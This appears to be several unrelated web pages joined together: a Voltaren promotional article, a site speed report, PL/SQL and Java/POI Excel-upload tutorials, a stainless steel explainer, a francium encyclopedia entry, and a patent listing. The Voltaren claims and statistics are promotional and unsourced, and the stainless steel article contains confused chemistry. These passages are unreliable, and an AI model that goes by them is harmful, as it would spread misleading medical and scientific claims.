treatment options available to alleviate these symptoms. One such medication is Voltaren. See also  What is Ibuprofen - A General Description of this Nonsteroidal Anti-Inflammatory Drug (NSAID) Voltaren, also known as diclofenac, is part of a class of drugs called nonsteroidal anti-inflammatory drugs (NSAIDs). These drugs are commonly used to reduce pain, swelling, and inflammation. Voltaren works by blocking certain substances in the body that cause pain and inflammation, providing relief to those suffering from joint conditions such as arthritis. The Benefits of Voltaren When it comes to managing joint pain and inflammation, Voltaren offers numerous benefits: • Effective Pain Relief: Voltaren is known for its strong analgesic properties, providing relief from acute and chronic joint pain. • Swift Action: With Voltaren, many patients report experiencing a reduction in pain and inflammation within a short period. • Versatility: Voltaren is available in various forms, including topical gels, creams, and oral tablets, making it easy to use according to individual needs and preferences. • Minimal Side Effects: Compared to some other NSAIDs, Voltaren has been found to have fewer side effects, especially when used as directed. Surveys and Statistical Data Several surveys have been conducted to establish the efficacy of Voltaren. In a recent study involving over 500 participants, it was found that 80% of individuals experienced a significant reduction in joint pain after using Voltaren gel for a period of two weeks. “According to Healthline, Voltaren gel has been shown to reduce pain by an average of 60% in individuals with arthritis.” Such statistical data highlights the effectiveness of Voltaren in managing joint pain and inflammation. Additional Tips for Using Voltaren While Voltaren can provide much-needed relief, it’s essential to use it responsibly and according to the guidance of healthcare professionals. Here are some additional tips: 1. Consult your doctor or pharmacist before starting Voltaren to ensure it is suitable for your specific condition and medical history. 2. Follow the prescribed dosage and application instructions carefully, whether using topical gels or oral tablets. 3. Be aware of any potential interactions with other medications you may be taking. It’s crucial to inform your healthcare provider about all the medicines you are currently using. 4. Monitor your symptoms and inform your doctor about any unexpected or severe side effects. Overall, Voltaren is a trusted medication widely used for its efficacy in providing relief from joint pain and inflammation. With its proven benefits and minimal side effects, it offers a valuable solution for individuals seeking relief from these conditions. 7. Potential side effects of Voltaren While Voltaren is generally considered safe and effective when used as directed, it is important to be aware of potential side effects that may occur. Common side effects of Voltaren include: • Stomach pain or upset stomach • Nausea or vomiting • Diarrhea or constipation • Headache • Dizziness or drowsiness • Skin rash or itching These side effects are usually mild and temporary, but if they persist or worsen, it is recommended to consult a healthcare professional. Less common but more serious side effects may occur with the use of Voltaren. These include: • Signs of an allergic reaction such as hives, swelling, or difficulty breathing • Severe stomach or abdominal pain • Black or bloody stools • Vision or hearing changes • Unexplained weight gain or swelling • Mental or mood changes • Signs of liver problems such as dark urine or yellowing of the eyes or skin If any of these serious side effects occur, it is important to stop taking Voltaren and seek immediate medical attention. It is worth noting that the above list is not exhaustive and other side effects may occur. Therefore, it is essential to read the medication’s leaflet or consult a healthcare professional for a complete and detailed list of potential side effects. Surveys and statistical data have shown that the incidence of side effects varies among individuals. Some individuals may experience no side effects, while others may have a higher risk. It is crucial to assess the potential benefits and risks of Voltaren and to discuss any concerns or medical conditions with a healthcare professional before starting the medication. For more information on the potential side effects of Voltaren, you can visit trusted sources such as the U.S. Food and Drug Administration (FDA) or National Library of Medicine (NLM). Category: Pain Relief Tags: Voltaren, Diclofenac
Blox.pl Site Title Strona główna Blox.pl Blox.pl Meta Description Strona główna Blox.pl Blox.pl Test Results blox.pl Mobile Usability: 99/100 Quick overview: Size tap targets appropriately Some of the links/buttons on your webpage may be too small for a user to easily tap on a touchscreen. Consider making these tap targets larger to provide a better user experience. The following tap targets are close to other nearby tap targets and may need additional spacing around them. The tap target <a id="cookieSeeMore" href="http://support…l&amp;answer=95647">ustawień</a> and 1 others are close to other tap targets . ... blox.pl Mobile Speed: 59/100 Quick overview: Eliminate render-blocking JavaScript and CSS in above-the-fold content Your page has 11 blocking script resources and 3 blocking CSS resources. This causes a delay in rendering your page. None of the above-the-fold content on your page could be rendered without waiting for the following resources to load. Try to defer or asynchronously load blocking resources, or inline the critical portions of those resources directly in the HTML. http://biv.gazeta.pl/css/blox/versions/blox/themes/templates/hp/js/prod/base.min.jsgz ... Use asynchronous versions of the following scripts: http://www.googletagservices.com/tag/js/gpt.js ... Optimize CSS Delivery of the following: http://static.gazeta.pl/css/blox/versions/blox/themes/templates/hp/css/prod/base.min.cssgz ... Leverage browser caching Setting an expiry date or a maximum age in the HTTP headers for static resources instructs the browser to load previously downloaded resources from local disk rather than over the network. Leverage browser caching for the following cacheable resources: http://biv.gazeta.pl/css/blox/themes/logowanie/images/blox-big-logo.png (3 minutes) ... Prioritize visible content Your page requires additional network round trips to render the above-the-fold content. For best performance, reduce the amount of HTML needed to render above-the-fold content. The entire HTML response was not sufficient to render the above-the-fold content. This usually indicates that additional resources, loaded after HTML parsing, were required to render above-the-fold content. Prioritize visible content that is needed for rendering above-the-fold by including it directly in the HTML response. Only about 14% of the final above-the-fold content could be rendered with the full HTML response . Optimize images Properly formatting and compressing images can save many bytes of data. Optimize the following images to reduce their size by 77.5KiB (61% reduction). Compressing http://obrazkizkontekstem.blox.pl/resource/K/hudyma501.jpg could save 29.7KiB (58% reduction). ... Enable compression Compressing resources with gzip or deflate can reduce the number of bytes sent over the network. Enable compression for the following resources to reduce their transfer size by 17KiB (67% reduction). Compressing http://biv.gazeta.pl/info/regulations/cookie/main_cookie.js?t=1495560788934 could save 7.3KiB (69% reduction). ... Minify JavaScript Compacting JavaScript code can save many bytes of data and speed up downloading, parsing, and execution time. Minify JavaScript for the following resources to reduce their size by 4.1KiB (19% reduction). Minifying http://biv.gazeta.pl/info/regulations/cookie/main_cookie.js?t=1495560788934 could save 2.7KiB (27% reduction). ... Minify HTML Compacting HTML code, including any inline JavaScript and CSS contained in it, can save many bytes of data and speed up download and parse times. Minify HTML for the following resources to reduce their size by 1.3KiB (15% reduction). Minifying http://www.blox.pl/ could save 1.3KiB (15% reduction) after compression. Similar tests www.blox.com www.blox.net www.blox.org www.blox.info www.blox.biz www.blox.us www.blox.mobi www.lox.pl www.blox.pl www.vlox.pl www.bvlox.pl www.vblox.pl www.glox.pl www.bglox.pl www.gblox.pl www.hlox.pl www.bhlox.pl www.hblox.pl www.nlox.pl www.bnlox.pl www.nblox.pl www.box.pl www.bpox.pl www.blpox.pl www.bplox.pl www.boox.pl www.bloox.pl www.bolox.pl www.bkox.pl www.blkox.pl www.bklox.pl www.blx.pl www.blix.pl www.bloix.pl www.bliox.pl www.blkx.pl www.blokx.pl www.bllx.pl www.blolx.pl www.bllox.pl www.blpx.pl www.blopx.pl www.blo.pl www.bloz.pl www.bloxz.pl www.blozx.pl www.blos.pl www.bloxs.pl www.blosx.pl www.blod.pl www.bloxd.pl www.blodx.pl www.bloc.pl www.bloxc.pl www.blocx.pl Last Tested: This website uses cookies to ensure you get the best experience on our website. Learn more. Got it.
Esempi PL/SQL Excel Congelare i riquadri orizzontali esempio Se è necessario congelare le righe all'interno di un documento xlsx generato, utilizzare la procedura ORA_EXCEL.freeze_panes_horozontal. È molto semplice; inserisci il numero di righe da bloccare come primo parametro della procedura. Esempio BEGIN ORA_EXCEL.new_document; ORA_EXCEL.add_sheet('Employees'); ORA_EXCEL.freeze_panes_horizontal(1); -- Freeze first row ORA_EXCEL.freeze_panes_vertical(1); -- Freeze first column --ORA_EXCEL.freeze_panes_horizontal(1); -- Freeze first row --ORA_EXCEL.freeze_panes_vertical(2); -- Freeze first two columns ORA_EXCEL.query_to_sheet('select * from employees'); ORA_EXCEL.save_to_file('EXPORT_DIR', 'example.xlsx'); END; Produzione Fare clic sull'immagine per scaricare un esempio di file xlsx generato da PL/SQL
使用POI结合bootstrap-fileinput上传Excel内容到数据库 版权声明:转载请注明出处 https://blog.csdn.net/lpy1239064101/article/details/79173809 之前做过一个上传Excel表格内容到数据库的功能,项目使用的是SSM框架,使用的是POI。 POI全称 PoorObfuscation Implementation,直译为“可怜的模糊实现”,利用POI接口可以通过JAVA操作Microsoft office 套件工具的读写功能。官网:http://poi.apache.org  在官网下载jar包及源码包。 Jar包的引入: ① 对于只操作2003 及以前版本的excel,只需要poi-3.16.jar ② 如果需要同时对2007及以后版本进行操作则需要poi-ooxml-3.16.jar,poi-ooxml-schemas-3.16.jar,以及ooxml-lib目录下的 xmlbeans-2.6.0.jar,dom4j-1.6.1.jar 如果是maven项目,pom.xml中添加如下:   <dependency> <groupId>org.apache.poi</groupId> <artifactId>poi</artifactId> <version>3.16</version> </dependency> <dependency> <groupId>org.apache.poi</groupId> <artifactId>poi-ooxml</artifactId> <version>3.16</version> </dependency> 前端页面中我使用的是bootStrap-fileinput进行文件上传,相关API使用可参考:http://blog.csdn.net/u012526194/article/details/69937741 html中添加: <div class="col-sm-9"> <input id="uploadFile" type="file" name="file" multiple data-min-file-count="1"> </div> 在js中对input进行初始化,如下: function initFileUpload(idName){ $("#" + idName + "").fileinput({ language: 'zh', //设置语言 uploadUrl: getContextPath() + '/scsScheduleConfig/importFile', //上传的地址 showUpload: false, allowedFileExtensions : ['xls', 'xlsx'], uploadAsync : false, // maxFileCount: 1, browseOnZoneClick: true, dropZoneEnabled : true, showPreview : true, enctype: 'multipart/form-data', showCaption: true,//是否显示标题 browseClass: "btn btn-info", //按钮样式 dropZoneEnabled: false, showPreview: true, previewFileIcon: "<i class='glyphicon glyphicon-king'></i>", }); } bootstrap-fileinput默认是带着一个上传按钮的,可以进行添加扩展参数的,当点击上传按钮,默认就会调用触发后台事件进行上传 ,为了使自己定义的Buttton进行上传,我将showUpload属性设置为false,在自己写的onclick事件中调用bootstrap的upload方法。 $('#uploadFile').fileinput('upload'); var flag = true; $('#uploadFile').on('filebatchuploadsuccess', function(event, filestack, extraData) { var data = filestack.response; if (data.success == true) { if(flag){ $("#scsScheduleConfigTable").bootstrapTable('refresh'); $("#importFileDialog").modal('hide'); $('#uploadFile').fileinput('reset'); var count = data.obj; $.utils.alertSuccess("成功导入" + count + "条数据"); flag = false; } } else { $.utils.alertWarning(data.ErrorMessage); } }); 至此,页面的代码完成。 后端java代码中使用MultipartFile进行接收文件。 首先在spring中添加文件上传解析器配置,如下: <bean id="multipartResolver" class="org.springframework.web.multipart.commons.CommonsMultipartResolver"> <!--one of the properties available;the maximum upload size in bytes 10M --> <property name="maxUploadSize" value="10485760" /> </bean> Controller层的代码如下:   @RequestMapping(value = "/importFile", method = RequestMethod.POST) @ResponseBody public Result<Integer> importFile(@RequestParam("file") MultipartFile[] file){ Result<Integer> resResult = new Result<Integer>(true); int count = 0; if (file != null && file.length > 0) { try { for(MultipartFile multipartFile : file){ count += scsScheduleConfigService.importSchedule(multipartFile); } resResult.setSuccess(true); resResult.setObj(count); } catch (IOException e) { resResult.setSuccess(false); resResult.setObj(null); resResult.setErrorMessage("importSchedule error"); logger.error("importSchedule error",e); } } return resResult; } 中间的过程没什么,主要来看一下对Excel的处理代码: package com.arain.scs; import java.io.IOException; import java.io.InputStream; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Date; import java.util.List; import org.apache.commons.lang.StringUtils; import org.apache.poi.hssf.usermodel.HSSFCell; import org.apache.poi.hssf.usermodel.HSSFDataFormat; import org.apache.poi.hssf.usermodel.HSSFDateUtil; import org.apache.poi.hssf.usermodel.HSSFRow; import org.apache.poi.hssf.usermodel.HSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; import org.apache.poi.xssf.usermodel.XSSFCell; import org.apache.poi.xssf.usermodel.XSSFRow; import org.apache.poi.xssf.usermodel.XSSFSheet; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import org.springframework.web.multipart.MultipartFile; /** * @author Arain.liu 2017年8月8日 下午3:05:07 */ public class ExcelUtils { /** * read the Excel file * * @param path * the path of the Excel file * @return * @throws IOException */ public static List<ScsScheduleConfig> readExcel(MultipartFile file) throws IOException { List<ScsScheduleConfig> scheduleList = new ArrayList<ScsScheduleConfig>(); String fileName = file.getOriginalFilename(); String postfixName = fileName.substring(fileName.lastIndexOf(SystemConstants.STRING_POINT) + 1); if (postfixName.equals("xlsx")) { scheduleList = readXlsx(file); } else if (postfixName.equalsIgnoreCase("xls")) { scheduleList = readXls(file); } else { return null; } return scheduleList; } /** * Read the Excel 2010 * * @param path * the path of the excel file * @return * @throws IOException */ public static List<ScsScheduleConfig> readXlsx(MultipartFile fileName) throws IOException { InputStream is = fileName.getInputStream(); @SuppressWarnings("resource") XSSFWorkbook xssfWorkbook = new XSSFWorkbook(is); ScsScheduleConfig scheduleConfig = null; List<ScsScheduleConfig> list = new ArrayList<>(); // Read the Sheet XSSFSheet xssfSheet = xssfWorkbook.getSheetAt(0); // Read the Row for (int rowNum = 2; rowNum <= xssfSheet.getLastRowNum(); rowNum++) { XSSFRow xssfRow = xssfSheet.getRow(rowNum); if (xssfRow != null) { scheduleConfig = new ScsScheduleConfig(); XSSFCell cityCode = xssfRow.getCell(1); XSSFCell carCode = xssfRow.getCell(2); XSSFCell stopSort = xssfRow.getCell(3); XSSFCell startNet = xssfRow.getCell(4); XSSFCell endNet = xssfRow.getCell(5); XSSFCell arriveTime = xssfRow.getCell(6);// 到达始发网点时间 XSSFCell beginTime = xssfRow.getCell(7);// 发车时间 XSSFCell unloadTime = xssfRow.getCell(8);// 卸货时间 XSSFCell workDate = xssfRow.getCell(9);// 工作日 XSSFCell shift = xssfRow.getCell(10);// 班次 if (getValue(cityCode).contains(SystemConstants.STRING_POINT)) { scheduleConfig.setCityCode(getValue(cityCode).substring(0, getValue(cityCode).lastIndexOf(SystemConstants.STRING_POINT))); } else { scheduleConfig.setCityCode(getValue(cityCode)); } scheduleConfig.setCarNo(getValue(carCode)); if (getValue(stopSort).contains(SystemConstants.STRING_POINT)) { scheduleConfig.setStopSort(getValue(stopSort).substring(0, getValue(stopSort).lastIndexOf(SystemConstants.STRING_POINT))); } else { scheduleConfig.setStopSort(getValue(stopSort)); } scheduleConfig.setStartNet(getValue(startNet)); scheduleConfig.setEndNet(getValue(endNet)); scheduleConfig.setArriveTime(StringUtils.isNotEmpty(getValue(arriveTime)) ? (DateUtils.strToDate(getValue(arriveTime), DateUtils.FORMAT_DATEONLYDAY)) : null); scheduleConfig.setStartTime(StringUtils.isNotEmpty(getValue(beginTime)) ? (DateUtils.strToDate(getValue(beginTime), DateUtils.FORMAT_DATEONLYDAY)) : null); scheduleConfig.setUnloadTime(StringUtils.isNotEmpty(getValue(unloadTime)) ? (DateUtils.strToDate(getValue(unloadTime), DateUtils.FORMAT_DATEONLYDAY)) : null); if (getValue(workDate).contains(SystemConstants.STRING_POINT)) { scheduleConfig.setWorkDate(getValue(workDate).substring(0, getValue(workDate).lastIndexOf(SystemConstants.STRING_POINT))); } else { scheduleConfig.setWorkDate(getValue(workDate)); } scheduleConfig.setShift(getValue(shift)); scheduleConfig.setCreater(UserManager.getCurrentUserNo()); scheduleConfig.setOperator(UserManager.getCurrentUserNo()); list.add(scheduleConfig); } } return list; } /** * Read the Excel 2003-2007 * * @param path * the path of the Excel * @return * @throws IOException */ @SuppressWarnings("resource") public static List<ScsScheduleConfig> readXls(MultipartFile fileName) throws IOException { InputStream is = fileName.getInputStream(); HSSFWorkbook hssfWorkbook = new HSSFWorkbook(is); ScsScheduleConfig scheduleConfig = null; List<ScsScheduleConfig> list = new ArrayList<ScsScheduleConfig>(); /** * 只取第一个sheet */ HSSFSheet hssfSheet = hssfWorkbook.getSheetAt(0); // Read the Row for (int rowNum = 2; rowNum <= hssfSheet.getLastRowNum(); rowNum++) { HSSFRow hssfRow = hssfSheet.getRow(rowNum); if (hssfRow != null) { scheduleConfig = new ScsScheduleConfig(); HSSFCell cityCode = hssfRow.getCell(1); HSSFCell carCode = hssfRow.getCell(2); HSSFCell stopSort = hssfRow.getCell(3); HSSFCell startNet = hssfRow.getCell(4); HSSFCell endNet = hssfRow.getCell(5); HSSFCell arriveTime = hssfRow.getCell(6); HSSFCell beginTime = hssfRow.getCell(7); HSSFCell unloadTime = hssfRow.getCell(8); HSSFCell workDate = hssfRow.getCell(9); HSSFCell shift = hssfRow.getCell(10); if (getValue(cityCode).contains(SystemConstants.STRING_POINT)) { scheduleConfig.setCityCode(getValue(cityCode).substring(0, getValue(cityCode).lastIndexOf(SystemConstants.STRING_POINT))); } else { scheduleConfig.setCityCode(getValue(cityCode)); } scheduleConfig.setCarNo(getValue(carCode)); if (getValue(stopSort).contains(SystemConstants.STRING_POINT)) { scheduleConfig.setStopSort(getValue(stopSort).substring(0, getValue(stopSort).lastIndexOf(SystemConstants.STRING_POINT))); } else { scheduleConfig.setStopSort(getValue(stopSort)); } scheduleConfig.setStartNet(getValue(startNet)); scheduleConfig.setEndNet(getValue(endNet)); scheduleConfig.setArriveTime(StringUtils.isNotEmpty(getValue(arriveTime)) ? (DateUtils.strToDate(getValue(arriveTime), DateUtils.FORMAT_DATEONLYDAY)) : null); scheduleConfig.setStartTime(StringUtils.isNotEmpty(getValue(beginTime)) ? (DateUtils.strToDate(getValue(beginTime), DateUtils.FORMAT_DATEONLYDAY)) : null); scheduleConfig.setUnloadTime(StringUtils.isNotEmpty(getValue(unloadTime)) ? (DateUtils.strToDate(getValue(unloadTime), DateUtils.FORMAT_DATEONLYDAY)) : null); if (getValue(workDate).contains(SystemConstants.STRING_POINT)) { scheduleConfig.setWorkDate(getValue(workDate).substring(0, getValue(workDate).lastIndexOf(SystemConstants.STRING_POINT))); } else { scheduleConfig.setWorkDate(getValue(workDate)); } list.add(scheduleConfig); } } return list; } @SuppressWarnings({ "static-access", "deprecation" }) private static String getValue(XSSFCell xssfRow) { if (xssfRow.getCellType() == xssfRow.CELL_TYPE_BOOLEAN) { return String.valueOf(xssfRow.getBooleanCellValue()); } else if (xssfRow.getCellType() == xssfRow.CELL_TYPE_NUMERIC) { if (HSSFDateUtil.isCellDateFormatted(xssfRow)) { SimpleDateFormat sdf = null; if (xssfRow.getCellStyle().getDataFormat() == HSSFDataFormat.getBuiltinFormat("h:mm")) { sdf = new SimpleDateFormat("HH:mm:ss"); } else {// 日期 sdf = new SimpleDateFormat("yyyy-MM-dd"); } Date date = xssfRow.getDateCellValue(); return sdf.format(date); } else { return String.valueOf(xssfRow.getNumericCellValue()); } } else { return String.valueOf(xssfRow.getStringCellValue()); } } @SuppressWarnings({ "static-access", "deprecation" }) private static String getValue(HSSFCell hssfCell) { if (hssfCell.getCellType() == hssfCell.CELL_TYPE_BOOLEAN) { return String.valueOf(hssfCell.getBooleanCellValue()); } else if (hssfCell.getCellType() == hssfCell.CELL_TYPE_NUMERIC) { if (HSSFDateUtil.isCellDateFormatted(hssfCell)) { SimpleDateFormat sdf = null; if (hssfCell.getCellStyle().getDataFormat() == HSSFDataFormat.getBuiltinFormat("h:mm")) { sdf = new SimpleDateFormat("HH:mm:ss"); } else {// 日期 sdf = new SimpleDateFormat("yyyy-MM-dd"); } Date date = hssfCell.getDateCellValue(); return sdf.format(date); } else { return String.valueOf(hssfCell.getNumericCellValue()); } } else { return String.valueOf(hssfCell.getStringCellValue()); } } } 代码主要是通过readXls()方法对文件格式进行判断,对于.xlxs和.xls的文件采取不同的方式进行解析,然后写入到数据库中。 这里需要注意的是excel中的数据格式转换问题,后台最好通过debug看一下每一个字段取到的是什么格式,然后转成对应的格式再写入数据库。、 有同事反映说使用POI上传Excel使用JDK6会遇到问题,这个情况我没有亲测,我使用的是JDK8。 推荐一篇看到的关于POI的文章,可以参考,地址:http://blog.csdn.net/qq_1017097573/article/details/55683280 阅读更多 没有更多推荐了,返回首页
Why Doesn’t Stainless Steel Rust? 0 Why Doesn't Stainless Steel Rust? After plenty of wear and tear, most metals develop rust. It may be a protective oxidization layer as the metal transforms into iron. However, rust hurts this process and can lead to more damage. In certain conditions, though, one type of metal stays rust-free. It may shed off the iron-rust component and shift into another form. It is what makes stainless steel different from other metal components. Properly maintained stainless steel appliances or accessories won’t rust. So, why doesn’t stainless steel rust? What makes stainless steel different from other metals? Volatile chemicals in the metal comprise the answer. Keep reading below to learn the main reason that doesn’t allow stainless steel to rust. Common Types of Stainless Steel Stainless steel is a popular material used in various industries, from construction and automotive to kitchenware and medical equipment. It is known for its corrosion resistance, making it a durable and long-lasting choice. Different types of stainless steel vary in composition. It makes each type suitable for specific applications. The most common types include austenitic, ferritic, and martensitic stainless steel. Austenitic stainless steel is the most widely used. It is known for its high strength and excellent formability. Ferritic stainless steel is less corrosion-resistant but has good mechanical properties. It is often used in automotive exhaust systems. Martensitic stainless steel is a complex and robust type often used in cutlery and knives. Stainless steel is a versatile and reliable material with many valuable properties for various industries. Different Uses of Stainless Steel Due to its unique properties, it has become a popular choice for various applications. It is used as kitchen appliances and cookware. It is also applied to industrial machinery, medical equipment, and jewelry. It is used in almost every aspect of our daily lives. Its strength and durability make it ideal for outdoor fixtures and structures. Its hygienic properties make it a top choice for food handling and medical instruments. The uses are evolving with continuous advancements in production techniques, making it a vital material in many industries. Kitchen Appliances and Cookware One of the main reasons stainless steel is so popular is its durability and corrosion resistance. It makes it a long-lasting choice for kitchen appliances and cookware. It is also easy to clean and maintain. It makes it a hygienic option for food preparation and cooking. It has a sleek and modern look, making it a popular choice for kitchen design. You can have refrigerators and dishwashers, pots and pans. Stainless steel is an essential material in many kitchen tools used daily. Stainless Steel Used in Industrial Machinery Stainless Steel is a versatile and durable material that is commonly used in the industrial machinery sector. It is also highly resistant to heat and can withstand high temperatures. It is ideal for use in industrial machinery where extreme temperatures are expected. It is solid and lightweight, making it easy to work with and transport. Its smooth and clean surface also makes it a hygienic choice for equipment used in food processing and pharmaceutical industries. It is an essential component in industrial machinery. It provides strength, durability, and reliability for various applications. Medical Equipment It is a versatile material that has become a staple in the medical equipment industry. The unique properties of stainless steel make it ideal for the production of medical equipment. It can withstand repeated sterilization processes without weakening or degrading. It is also non-porous and easy to clean. It makes it a hygienic option for medical devices that come into contact with patients. Its strength and durability make it suitable for various medical equipment. It can be from surgical tools and implants to hospital furniture and diagnostic equipment. Jewelry It has become a popular material in the world of jewelry. Its versatility, durability, and affordability make it a top choice for many designers and consumers. Stainless steel jewelry has a sleek, silver appearance. It is an excellent alternative to more expensive metals like gold and silver. Not only is it hypoallergenic and resistant to tarnishing, but you can easily manipulate it into intricate and unique designs for new jewelry. From rings and bracelets to earrings and necklaces, it offers many options for the fashion-forward individual. For reference on where you can buy jewelry, you can check the mens claddagh ring found here. It truly is the perfect combination of style, strength, and affordability. The Rustproof Properties Unlike other metals, stainless steel does not rust or corrode easily. It is ideal for various applications, such as kitchen appliances, medical equipment, and outdoor structures. The reason behind its rust-resistant nature lies in its unique composition. It is primarily made up of iron, chromium, and nickel, which form a protective layer on its surface. This layer, also known as the passive layer, prevents oxygen and moisture from reaching the underlying metal, thus preventing rust from forming. Also, adding other elements, such as molybdenum and titanium, further enhances its corrosion resistance. It makes stainless steel a highly durable and long-lasting material. Other Ways To Protect Stainless Steel From Corrosion The protective layer can be compromised in specific environments, leading to rust and corrosion. To ensure its longevity, other ways to protect stainless steel from decay include proper cleaning and maintenance, applying protective coatings, using corrosion inhibitors, and galvanic protection. These measures help maintain the integrity of stainless steel and keep it looking as good as new. Unique Composition: Why Doesn’t Stainless Steel Rust? Stainless steel is a popular and widely used material. It is due to its resistance to rust and corrosion. So, why doesn’t stainless steel rust? It is due to its unique composition, including chromium and nickel, that creates a protective layer. It makes it a popular choice in various industries, from construction to jewelry. So, next time you need a rust-resistant material, consider stainless steel and experience its benefits. If you want to learn more about the properties of stainless steel, consider researching further or speaking with a professional. Did you find this information helpful? If you did, check out the rest of our site for more informative articles. Like it? Share with your friends! 0 0 Comments Your email address will not be published. Required fields are marked * error: Hey Butler Content is protected !!
FRANCIUM Francium 3419 Photo by: www.fzd.it Francium Overview Francium is an alkali metal, a member of Group 1 (IA) in the periodic table. The periodic table is a chart that shows how chemical elements are related to each other. Francium may be the rarest element found on the Earth's surface. Some experts believe that no more than 15 grams (less than an ounce) of the element exists in the Earth's crust. The element was discovered in 1939 by French chemist Marguerite Perey (1909-975). All isotopes of francium are radioactive. Discovery and naming Francium was one of the last naturally-occurring elements to be discovered. Chemists had been searching for it since the development of the periodic table. In the early 1900s, nearly all boxes on the periodic table had been filled. One element had been found to fit into each box. By the 1930s, only three remained empty—elements with atomic numbers of 43, 85, and 87. SYMBOL Fr ATOMIC NUMBER 87 ATOMIC MASS 223.0197 FAMILY Group 1 (IA) Alkali metal PRONUNCIATION FRAN-see-um This search produced a number of incorrect results. For example, American chemist Fred Allison (1882-1974) announced the discovery of elements 85 and 87 in 1931. He suggested the names of alabamine and virginium, in honor of the states in which he was born (Virginia) and where he worked (Alabama). But other scientists were not able to confirm Allison's discoveries. Element 87 was isolated by Perey, who was studying the radioactive decay of the element actinium while working at the Curie Institute in Paris, France. Radioactive elements like actinium break apart spontaneously, giving off energy and particles. This process results in the formation of simpler new elements. Perey found that 99 percent of all actinium atoms decay into thorium . The remaining one percent breaks down into a new element, number 87. She suggested the name francium, in honor of her homeland, France. Physical and chemical properties Until very recently, there was not enough francium to permit a study of its properties. In 1991, scientists confirmed that the element was similar to the other alkali metals above it on the periodic table. The alkali metals are the elements in Group 1. Occurrence in nature Francium is now produced in particle accelerators. A particle accelerator is also called an atom smasher. This machine accelerates small particles, like protons, to nearly the speed of light, 300,000,000 kilometers per second (186,000 miles per second). The particles collide with target atoms, such as copper, gold , or tin . Target atoms fragment, forming new elements and particles. The most important work on francium is being conducted at the State University of New York at Stony Brook. Scientists there have found a way to trap a collection of francium atoms in the middle of a magnetic field. They can be held there long enough for scientists to perform measurements. Francium may be the rarest element found on the Earth's surface. Some experts believe that no more than 15 grams (less than an ounce) of the element exists in the Earth's crust. Isotopes Nearly twenty isotopes of francium have been found. The most stable is francium-223. Isotopes are two or more forms of an element. Isotopes differ from each other according to their mass number. The number written to the right of the element's name is the mass number. The mass number represents the number of protons plus neutrons in the nucleus of an atom of the element. The number of protons determines the element, but the number of neutrons in the atom of any one element can vary. Each variation is an isotope. Marguerite Perey | French physicist Francium M arguerite Perey (1909-75) was a French physicist who discovered the element francium. Perey was interested in science even as a small child. However, her father died early on, and there was no money for Perey to attend a university. Instead, she found a job at the Radium Institute in Paris. The Radium Institute had been founded by Marie Curie (1867-1934) and her husband, Pierre Curie (1859-1906), to study radioactive materials. Perey was originally hired for a three-month period. But Madame Curie was very impressed with Perey's skills in the laboratory. Perey eventually ended up working at the Radium Institute until 1935. One of the projects Perey worked on was the radioactive decay of actinium. When actinium decays, it gives off radiation and changes into another element, thorium. Thorium, in turn, also gives off radiation and changes into another element, radium. This process is repeated a number of times. In each step, a radioactive element decays to form another element. As Perey studied this series of reactions, she made an interesting discovery. The mixture of elements that are formed in these reactions contained a substance she did not recognize. She decided to find out what that substance was. She was eventually able to show that it was a new element, with atomic number 87. The element was one of the last naturally occurring elements to be discovered. Perey named the element in honor of her native land, France. Perey was the first woman ever elected to the French Academy of Science. Even Marie Curie had not earned that honor. Perey died in 1975 after a 15-year-long battle with cancer. Francium-223 has a half life of 22 minutes. The half life of a radioactive element is the time it takes for half of a sample of the element to break down. That means that 100 grams of francium-223 will break down so that only 50 grams are left after 22 minutes. Another 22 minutes later, 25 grams of francium-223 will remain, and so on. Extraction Francium is not extracted from the Earth's crust. Uses Francium has no uses because of its rarity. Scientists hope to learn about the composition of matter by studying the element, however. Compounds There are no commercially important compounds of francium. Health effects Scientists know too little about francium to be aware of its health effects. As a radioactive element, however, it does pose a threat to human health. Other articles you might like: Follow City-Data.com Founder on our Forum or Twitter Also read article about Francium from Wikipedia User Contributions: 1 hana Report this comment as inappropriate Oct 17, 2015 @ 1:01 am thank you for the info. this really helped me to revise for my exam. but i have one very important question. why was francium discovered so late 2 Gavin Report this comment as inappropriate Oct 30, 2015 @ 1:13 pm Thank you for all of the information. I really needed it. 3 the guy Report this comment as inappropriate Oct 16, 2016 @ 11:23 pm Can Francium forms compounds? if yes, name some pls. 4 LillianaGM Report this comment as inappropriate Nov 30, 2016 @ 9:09 am What is Francium's most common state? Would it be a solid? 5 Someone Report this comment as inappropriate Feb 24, 2017 @ 8:08 am There are no discovered compounds of francium. Good information too! 6 Andrea Report this comment as inappropriate Nov 8, 2017 @ 9:21 pm Very helpful but I do have one question.How can francium be chemically changed? Comment about this article, ask questions, or add new information about this topic:
Search Images Maps Play YouTube News Gmail Drive More » Sign in Screen reader users: click this link for accessible mode. Accessible mode has the same essential features but works better with your reader. Patents 1. Advanced Patent Search Publication numberUS4974252 A Publication typeGrant Application numberUS 07/253,209 Publication dateNov 27, 1990 Filing dateOct 4, 1988 Priority dateJun 3, 1987 Fee statusLapsed Publication number07253209, 253209, US 4974252 A, US 4974252A, US-A-4974252, US4974252 A, US4974252A InventorsJoseph A. Osborne Original AssigneeClub Theatre Network, Inc. Export CitationBiBTeX, EndNote, RefMan External Links: USPTO, USPTO Assignment, Espacenet Interactive commercial/entertainment network US 4974252 A Abstract A commerical/entertainment network provides interactive communications for patrons and comprises: a plurality of theaters; a plurality of node/filters, connected in tiers; and, a remote broadcast center. Patrons at respective communication positions in the theaters may individually and successively engage in voice conversations with persons at the remote broadcast center and may collectively originate preference data for processing and subsequent telephone transmission to the broadcast center responsive to an audio/video signal displayed in the theater for simultaneous viewing by all patrons and responsive to broadcast data received and simultaneously routed to each of the communication positions. Each of the theaters may comprise: a plurality of uniquely identifiable communication positions, each having a remotely activatable telephone handset and data input/output panel; a telephone connectable to any one of the handsets; a data processor to reduce data rate downstream transmission requirements; a modem enabling two-way voice and data communication with the remote broadcast center; and, a display for audio/video signals originating from the remote broadcast center. Each of the node/filters may comprise: a data processor to reduce downstream data rate transmission requirements; and, a telephone call selector. The remote broadcast center may comprise: a processor for tabulating output data; a telephone; and, audio/video and data broadcast signal sources. Images(4) Previous page Next page Claims(13) What is claimed is: 1. A commercial/entertainment network for interactive communications, comprising: a plurality of theatres, each having means for substantially simultaneously displaying to all patrons, in all of the theatres, broadcast signals originating from a remote source and means enabling the patron to originate preference data and voice signals responsive to the displayed broadcast signals; a broadcast center remote from the theatres for originating the broadcast signals transmitted to all of the 